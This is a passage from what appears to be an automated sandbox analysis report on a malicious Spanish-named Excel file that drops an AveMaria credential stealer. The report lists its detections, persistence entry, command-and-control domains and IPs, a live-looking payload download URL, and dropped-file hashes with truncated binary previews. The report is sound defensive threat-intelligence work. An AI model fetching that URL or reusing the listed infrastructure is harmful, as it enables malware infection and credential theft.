                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: \Google\Chrome\User Data\Default\Login Data6_2_0040C1B2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: \Chromium\User Data\Default\Login Data6_2_0040C1B2
                Contains functionality to steal e-mail passwords
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: POP3 Password6_2_0040A29A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: SMTP Password6_2_0040A29A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: IMAP Password6_2_0040A29A
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: VPZVQXDUT.exe PID: 3564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: VPZVQXDUT.exe PID: 3600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: msimages.exe PID: 3704, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: msimages.exe PID: 3836, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected AveMaria stealer
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information42
                Scripting                		Valid Accounts11
                Native API                		42
                Scripting                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		23
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                Endpoint Denial of Service
                CredentialsDomainsDefault Accounts33
                Exploitation for Client Execution                		1
                DLL Side-Loading                		1
                Access Token Manipulation                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                System Service Discovery                		Remote Desktop Protocol21
                Input Capture                		21
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Service Execution                		1
                Create Account                		1
                Windows Service                		3
                Obfuscated Files or Information                		1
                Credentials In Files                		3
                File and Directory Discovery                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Windows Service                		321
                Process Injection                		2
                Software Packing                		NTDS24
                System Information Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchd1
                Registry Run Keys / Startup Folder                		1
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		LSA Secrets2
                Security Software Discovery                		SSHKeylogging213
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Masquerading                		Cached Domain Credentials41
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                Virtualization/Sandbox Evasion                		DCSync1
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation                		Proc Filesystem1
                Remote System Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt321
                Process Injection                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Hidden Files and Directories                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                Hidden Users                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574073 Sample: Estado.de.cuenta.xls Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 46 dns.stipamana.com 2->46 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 22 other signatures 2->64 10 EXCEL.EXE 8 23 2->10         started        15 msimages.exe 2->15         started        signatures3 process4 dnsIp5 48 www.stipamana.com 94.156.167.55, 443, 49163 SARNICA-ASBG Bulgaria 10->48 40 C:\Users\user\AppData\...\VPZVQXDUT.exe, PE32 10->40 dropped 42 C:\Users\user\AppData\...\asxhfzdhhz[1].exe, PE32 10->42 dropped 72 Document exploit detected (creates forbidden files) 10->72 17 VPZVQXDUT.exe 10->17         started        74 Contains functionality to hide user accounts 15->74 76 Injects a PE file into a foreign processes 15->76 20 msimages.exe 1 15->20         started        22 msimages.exe 15->22         started        file6 signatures7 process8 signatures9 50 Antivirus detection for dropped file 17->50 52 Contains functionality to hide user accounts 17->52 54 Machine Learning detection for dropped file 17->54 56 4 other signatures 17->56 24 VPZVQXDUT.exe 5 4 17->24         started        28 VPZVQXDUT.exe 17->28         started        process10 file11 38 C:\ProgramData\msimages.exe, PE32 24->38 dropped 66 Contains functionality to hide user accounts 24->66 68 Increases the number of concurrent connection per server for Internet Explorer 24->68 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->70 30 msimages.exe 24->30         started        signatures12 process13 signatures14 78 Antivirus detection for dropped file 30->78 80 Contains functionality to hide user accounts 30->80 82 Machine Learning detection for dropped file 30->82 84 Injects a PE file into a foreign processes 30->84 33 msimages.exe 2 30->33         started        36 msimages.exe 1 30->36         started        process15 dnsIp16 44 dns.stipamana.com 87.120.121.160, 49164, 49165, 49166 UNACS-AS-BG8000BurgasBG Bulgaria 33->44

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Estado.de.cuenta.xls50%ReversingLabsScript-Macro.Downloader.Heuristic
                Estado.de.cuenta.xls100%AviraHEUR/Macro.Downloader.MRDO.Gen
                Estado.de.cuenta.xls100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\msimages.exe100%AviraHEUR/AGEN.1311032
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exe100%AviraHEUR/AGEN.1311032
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe100%AviraHEUR/AGEN.1311032
                C:\ProgramData\msimages.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                dns.stipamana.com
                		87.120.121.160
                		truefalse
                  		high
                  www.stipamana.com
                  		94.156.167.55
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    dns.stipamana.comfalse
                      		high
                      https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exetrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/syohex/java-simple-mine-sweeperC:VPZVQXDUT.exe, 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, msimages.exe, 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/syohex/java-simple-mine-sweeperVPZVQXDUT.exefalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          87.120.121.160
                          		dns.stipamana.comBulgaria
                          		25206UNACS-AS-BG8000BurgasBGfalse
                          94.156.167.55
                          		www.stipamana.comBulgaria
                          		48584SARNICA-ASBGfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1574073
                          Start date and time:2024-12-12 21:44:45 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 13m 21s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:19
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • GSI enabled (VBA)
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Estado.de.cuenta.xls
                          Detection:MAL
                          Classification:mal100.phis.troj.spyw.expl.evad.winXLS@18/5@73/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 71
                          • Number of non-executed functions: 99
                          Cookbook Comments:
                          • Found application associated with file extension: .xls

                          Warnings

                          • Max analysis timeout: 600s exceeded, the analysis took too long
                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Estado.de.cuenta.xls

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          12:45:50AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run msimages C:\ProgramData\msimages.exe
                          15:45:43API Interceptor8x Sleep call for process: VPZVQXDUT.exe modified
                          15:45:46API Interceptor64028x Sleep call for process: msimages.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          87.120.121.160tqkdMdv2zO.docGet hashmaliciousXenoRATBrowse
                            file.exeGet hashmaliciousAveMaria, UACMeBrowse
                              uRxH0oSpKL.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                  38lQYJVIe9.exeGet hashmaliciousAveMaria, UACMeBrowse
                                    XUhf3m5FmK.exeGet hashmaliciousXenoRATBrowse
                                      plb2ptcqcI.docGet hashmaliciousXenoRATBrowse
                                        TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                          TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                            Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                              94.156.167.55gMqBZfJ5Mq.exeGet hashmaliciousLokibotBrowse
                                              • www.stipamana.com/jedrshyyjdft/Panel/five/fre.php

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.stipamana.comtqkdMdv2zO.docGet hashmaliciousXenoRATBrowse
                                              • 94.156.167.57
                                              gMqBZfJ5Mq.exeGet hashmaliciousLokibotBrowse
                                              • 94.156.167.55
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              Estado_de_cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.57
                                              plb2ptcqcI.docGet hashmaliciousXenoRATBrowse
                                              • 94.156.167.57
                                              TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                              • 94.156.167.57
                                              TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                              • 94.156.167.57
                                              TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                              • 94.156.167.57
                                              dns.stipamana.comtqkdMdv2zO.docGet hashmaliciousXenoRATBrowse
                                              • 87.120.121.160
                                              33ZqRNeabp.exeGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              file.exeGet hashmaliciousAveMaria, UACMeBrowse
                                              • 87.120.121.160
                                              uRxH0oSpKL.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                              • 87.120.121.160
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 87.120.121.160
                                              38lQYJVIe9.exeGet hashmaliciousAveMaria, UACMeBrowse
                                              • 87.120.121.160
                                              XUhf3m5FmK.exeGet hashmaliciousXenoRATBrowse
                                              • 87.120.121.160
                                              plb2ptcqcI.docGet hashmaliciousXenoRATBrowse
                                              • 87.120.121.160
                                              TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                              • 87.120.121.160
                                              TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                              • 87.120.121.160

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SARNICA-ASBGtqkdMdv2zO.docGet hashmaliciousXenoRATBrowse
                                              • 94.156.167.57
                                              33ZqRNeabp.exeGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              gMqBZfJ5Mq.exeGet hashmaliciousLokibotBrowse
                                              • 94.156.167.55
                                              sbs9FC81oX.exeGet hashmaliciousUnknownBrowse
                                              • 31.13.224.16
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              Estado_de_cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.57
                                              plb2ptcqcI.docGet hashmaliciousXenoRATBrowse
                                              • 94.156.167.57
                                              TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                              • 94.156.167.57
                                              UNACS-AS-BG8000BurgasBGhttps://0388net.ccGet hashmaliciousUnknownBrowse
                                              • 87.120.125.144
                                              https://0388net.ccGet hashmaliciousUnknownBrowse
                                              • 87.120.125.144
                                              tqkdMdv2zO.docGet hashmaliciousXenoRATBrowse
                                              • 87.120.121.160
                                              file.exeGet hashmaliciousAveMaria, UACMeBrowse
                                              • 87.120.121.160
                                              uRxH0oSpKL.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                              • 87.120.121.160
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 87.120.121.160
                                              38lQYJVIe9.exeGet hashmaliciousAveMaria, UACMeBrowse
                                              • 87.120.121.160
                                              c2.htaGet hashmaliciousXWormBrowse
                                              • 87.120.117.152
                                              XUhf3m5FmK.exeGet hashmaliciousXenoRATBrowse
                                              • 87.120.121.160
                                              plb2ptcqcI.docGet hashmaliciousXenoRATBrowse
                                              • 87.120.121.160

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              7dcce5b76c8b17472d024758970a406bSOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • 94.156.167.55
                                              Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                              • 94.156.167.55
                                              510005940.docx.docGet hashmaliciousUnknownBrowse
                                              • 94.156.167.55
                                              Document.xlaGet hashmaliciousUnknownBrowse
                                              • 94.156.167.55
                                              xeroxscan.DocxGet hashmaliciousUnknownBrowse
                                              • 94.156.167.55
                                              xeroxscan.DocxGet hashmaliciousUnknownBrowse
                                              • 94.156.167.55
                                              invoice09850.xlsGet hashmaliciousRemcosBrowse
                                              • 94.156.167.55
                                              Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • 94.156.167.55
                                              Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                              • 94.156.167.55
                                              tqkdMdv2zO.docGet hashmaliciousXenoRATBrowse
                                              • 94.156.167.55

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\msimages.exe

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):283648
                                              Entropy (8bit):7.970287151801596
                                              Encrypted:false
                                              SSDEEP:6144:A4qCIulquAQ40xAkvW2jxcbK9kMYzX/Qt8AsH7m2vOlPegMIOGd:DI6lAQ403vjjxcbKwr+8/sQgH
                                              MD5:07472F63BDEC0C4A83767D19B8B7BA19
                                              SHA1:32392707DDAC27EF3CB0BAA8365BA11D326E86CE
                                              SHA-256:044FF15E8D3C9534C11C3719BD88A8302611C697AE888B23C768CEC52F1970B6
                                              SHA-512:259DC8F8303B6BE1FDE58F090D2F628C80F9CAB83BE4DF93B0B272E3073658CF9504ACAB7795DF0727D900A025D9C2E5D1E7801A2F14C571F04E8B10A26F01AB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5[g.................B..........N`... ........@.. ....................................`.................................._..O.................................................................................... ............... ..H............text...T@... ...B.................. ..`.rsrc................D..............@..@.reloc...............R..............@..B................0`......H........H..,.................................................................r0.8...y...L.0,7a..I.9....4.^.iog.W..@Nf..E...on..?..s....P.}~.dw.j{.^.(....g.Z&(..Mk|.u.~|......P...{%.V.......Wk=.n`H.f.?....3)&$......V\7..e.WI.!.M-..F.}.D.t.[.W#....PD..%.......U..z5..Qc.....Z.Y%.^....K..a3..........$..G:.<.......!..5@!b....f.$..x/J.!. .'.......N.)...mX..>BP.l-.B...\L...`...~.....S.7.>7...|../..K....V......S..3.Qx...D..,.r..*.x.....z..b.Y..k.1.3_.`.D.g%L. ...

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exe

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):283648
                                              Entropy (8bit):7.970287151801596
                                              Encrypted:false
                                              SSDEEP:6144:A4qCIulquAQ40xAkvW2jxcbK9kMYzX/Qt8AsH7m2vOlPegMIOGd:DI6lAQ403vjjxcbKwr+8/sQgH
                                              MD5:07472F63BDEC0C4A83767D19B8B7BA19
                                              SHA1:32392707DDAC27EF3CB0BAA8365BA11D326E86CE
                                              SHA-256:044FF15E8D3C9534C11C3719BD88A8302611C697AE888B23C768CEC52F1970B6
                                              SHA-512:259DC8F8303B6BE1FDE58F090D2F628C80F9CAB83BE4DF93B0B272E3073658CF9504ACAB7795DF0727D900A025D9C2E5D1E7801A2F14C571F04E8B10A26F01AB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5[g.................B..........N`... ........@.. ....................................`.................................._..O.................................................................................... ............... ..H............text...T@... ...B.................. ..`.rsrc................D..............@..@.reloc...............R..............@..B................0`......H........H..,.................................................................r0.8...y...L.0,7a..I.9....4.^.iog.W..@Nf..E...on..?..s....P.}~.dw.j{.^.(....g.Z&(..Mk|.u.~|......P...{%.V.......Wk=.n`H.f.?....3)&$......V\7..e.WI.!.M-..F.}.D.t.[.W#....PD..%.......U..z5..Qc.....Z.Y%.^....K..a3..........$..G:.<.......!..5@!b....f.$..x/J.!. .'.......N.)...mX..>BP.l-.B...\L...`...~.....S.7.>7...|../..K....V......S..3.Qx...D..,.r..*.x.....z..b.Y..k.1.3_.`.D.g%L. ...

                                              C:\Users\user\AppData\Local\Temp\~DF6BC1F27B46A9C143.TMP

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BB7DF04E1B0A2570657527A7E108AE23
                                              SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                              SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                              SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\~DF751B2DD85BC11F44.TMP

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BB7DF04E1B0A2570657527A7E108AE23
                                              SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                              SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                              SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:modified
                                              Size (bytes):283648
                                              Entropy (8bit):7.970287151801596
                                              Encrypted:false
                                              SSDEEP:6144:A4qCIulquAQ40xAkvW2jxcbK9kMYzX/Qt8AsH7m2vOlPegMIOGd:DI6lAQ403vjjxcbKwr+8/sQgH
                                              MD5:07472F63BDEC0C4A83767D19B8B7BA19
                                              SHA1:32392707DDAC27EF3CB0BAA8365BA11D326E86CE
                                              SHA-256:044FF15E8D3C9534C11C3719BD88A8302611C697AE888B23C768CEC52F1970B6
                                              SHA-512:259DC8F8303B6BE1FDE58F090D2F628C80F9CAB83BE4DF93B0B272E3073658CF9504ACAB7795DF0727D900A025D9C2E5D1E7801A2F14C571F04E8B10A26F01AB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5[g.................B..........N`... ........@.. ....................................`.................................._..O.................................................................................... ............... ..H............text...T@... ...B.................. ..`.rsrc................D..............@..@.reloc...............R..............@..B................0`......H........H..,.................................................................r0.8...y...L.0,7a..I.9....4.^.iog.W..@Nf..E...on..?..s....P.}~.dw.j{.^.(....g.Z&(..Mk|.u.~|......P...{%.V.......Wk=.n`H.f.?....3)&$......V\7..e.WI.!.M-..F.}.D.t.[.W#....PD..%.......U..z5..Qc.....Z.Y%.^....K..a3..........$..G:.<.......!..5@!b....f.$..x/J.!. .'.......N.)...mX..>BP.l-.B...\L...`...~.....S.7.>7...|../..K....V......S..3.Qx...D..,.r..*.x.....z..b.Y..k.1.3_.`.D.g%L. ...

                                              Static File Info

                                              General

